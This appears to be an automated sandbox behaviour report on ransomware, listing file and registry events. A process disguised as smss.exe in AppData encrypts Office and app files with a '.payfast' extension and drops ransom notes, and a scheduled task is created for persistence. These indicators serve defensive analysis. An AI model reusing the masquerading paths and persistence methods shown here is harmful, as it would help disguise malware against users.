| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Todos_0.33.33351.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2106.12410.0_x64__8wekyb3d8bbwe\Images\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\AppCS\Assets\StoryBuilder\CreatingMovieAnimation\LOOP_300px\LOOP_300px.34.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2aaf2291.pri | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.tree.dat | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryResume.dotx | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.4.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesAppList.targetsize-32_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MediumTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Persona.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-pl.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\WPGIMP32.FLT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIF | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1909.12456.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21061.10121.0_x64__8wekyb3d8bbwe\GlassPixelShader.cso | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Assets\StoreLogo.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@fluentui\dom-utilities\lib-commonjs\IVirtualElement.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\THMBNAIL.PNG.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.INF.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.24.10001.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.GetHelp_10.2008.32311.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GetHelpBadgeLogo.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Data\StreamingAssets\10296_ag_smoke_wisp.json | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Assets\Store\LargeTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-48_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\DocumentCard\DocumentCardTitle.types.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\ro-RO\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\YourPhoneAppProxy\hu-HU\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.9.1942.0_x64__8wekyb3d8bbwe\Images\Square150x150Logo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIF.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreSmallTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21061.10121.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_10.3.41661.0_x64__8wekyb3d8bbwe\Assets\TipsBadgeLogo.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Resources\de-de\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-pl.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.targetsize-32_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\System32\Conhost.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDB8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI385.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD7C4D27291BA150D.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4075.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF5590309210AFF1AA.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9E9D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF152.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB85.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1B38.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI14DD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI17EB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Intel Rapid.job | C:\Users\Admin\AppData\Local\Temp\clpp.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF7CB3ABEA849AE37A.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f768dc5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF76E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC0C8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f768dc5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF82A5437AC0AFA3C8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1EE2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
